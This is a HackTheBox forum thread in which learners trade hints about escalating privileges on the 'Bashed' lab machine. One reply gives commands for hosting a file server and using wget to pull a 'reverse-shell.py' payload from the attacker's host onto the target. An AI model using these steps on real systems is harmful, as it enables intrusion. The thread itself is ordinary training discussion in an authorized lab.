Finally got this after having a decent discussion with one of our fellow HTB members. I was looking in the right places, but totally missed the importance of some vital information I had been staring at for days.
Anyway, rather than enumerate harder, I would say look at the information you have enumerated in more detail. Some of the scripts I ran didn’t directly add to my pool of information, but they definitely pointed to an implication and to something that I had previously discarded as a possibility.
I’d love to help, but since this was one of my first machines, I didn’t take good notes and lost what I did have. I remember how I exploited root, but I forgot how I got to break out of www-data privs…re-exploiting to see if I can figure it out.
Sure, actually breaking in to that system was the easiest thing I have ever seen, but getting root really confuses me. Anyway, thanks for checking it for me.
@stormworm29 said:
Sure, actually breaking in to that system was the easiest thing I have ever seen, but getting root really confuses me. Anyway, thanks for checking it for me.
If you have anything besides www-data, PM and I can explain past there
I’ve been struggling with getting root priv for the last 24 hours. I think I’m on the right path with using the sudo command to access certain directories but I have no idea how to get a read on root.txt when I require root to begin with. I also don’t know how to upload files that everyone else seems to be doing. I’ve tried my own research for hours on Linux permissions and directory commands but to no avail. I’m just looking to get steered in the right direction. Thanks
@BigEars said:
I’ve been struggling with getting root priv for the last 24 hours. I think I’m on the right path with using the sudo command to access certain directories but I have no idea how to get a read on root.txt when I require root to begin with. I also don’t know how to upload files that everyone else seems to be doing. I’ve tried my own research for hours on Linux permissions and directory commands but to no avail. I’m just looking to get steered in the right direction. Thanks
wget is your friend. Just host your own server like python -m SimpleHTTPServer 8080 and request the file from your shell.
I got the server up and running but it’s hosted locally instead of on my VPN. I’m having trouble getting it to work with wget while on the www-data shell so that I can download files. Is there a workaround for this? Is the use of a local server required for this machine before I go down a rabbit hole?
As for that certain directory, all I can see is a single python script and a test file. I cannot run the python script but I can view the contents of the test file without opening it. Am I overlooking anything aside from these files? Trying really hard to avoid giving too much away.
Much appreciation for all of your help. I’m frustrated but having fun.
Yaay, finally got root. Why it worked is a mystery to me. Can anyone spare two minutes and explain why my solution worked? I’ll DM solution and question
@BigEars you need to set up a small HTTP server in Kali. You can use PHP or Python. I normally use PHP.
In the Kali terminal you go to the folder where you placed the file you need transferred to the server you are trying to hack. Maybe you have a file named ‘reverse-shell.py’ in ‘/root/Machines/Bashed/www’ so you cd to that folder. Then you type ‘php -S 10.10.XXX.XXX:8080’ (change the IP to the IP you get via VPN).
You download the file on the machine you are trying to hack using wget or curl. Use wget like this:
‘wget http://10.10.XXX.XXX:8080/reverse-shell.py -O /tmp/reverse-shell.py’. This will download the file to the /tmp folder. If you omit -O it will download to the folder where you run the command.
@dirneboi Thanks for the tips. I was actually able to get the wget command to work almost immediately after my last post. I think the box was restarting when I tried downloading the file at http://10.10.XXX.XXX:8080/myscript.py so I thought I was doing something wrong when it didn’t work.
I feel so close to getting the key but I keep getting permissions denied whenever I try to run commands or python scripts that involve the root.txt file. At this point I’m not sure if my scripts are bad or if I’m missing something else involving permissions. I can’t believe this has taken me several days and is one of the easiest boxes. Definitely hurts the self-esteem haha.
Day 8 and I still have not gotten root.txt. Not sure what else to try at this point. I know which directory I’m supposed to interact with using scriptmanager but I can’t see how it can possibly help me with root.txt considering that I cannot interact with the root folder at all without getting a permission denied error.
Same here…for days I’m trying to get root. I am the other user, I alter the script to try to access the root.txt but this user has no permission to access the root folder.
I know the user is special, I can create a reverse shell bash as the other user, can alter his script but still don’t know what to do to get the root file. I suck at this
@CaptnCrash said:
Same here…for days I’m trying to get root. I am the other user, I alter the script to try to access the root.txt but this user has no permission to access the root folder.
I know the user is special, I can create a reverse shell bash as the other user, can alter his script but still don’t know what to do to get the root file. I suck at this
Not sure where to post, but I’m stuck as well at getting root. Noob here. I got a reverse shell more or less fully interactive, I got into the famous directory but no idea of how to use a script to get /root.txt where I have zero permissions on. Anyone keen to help me in PM?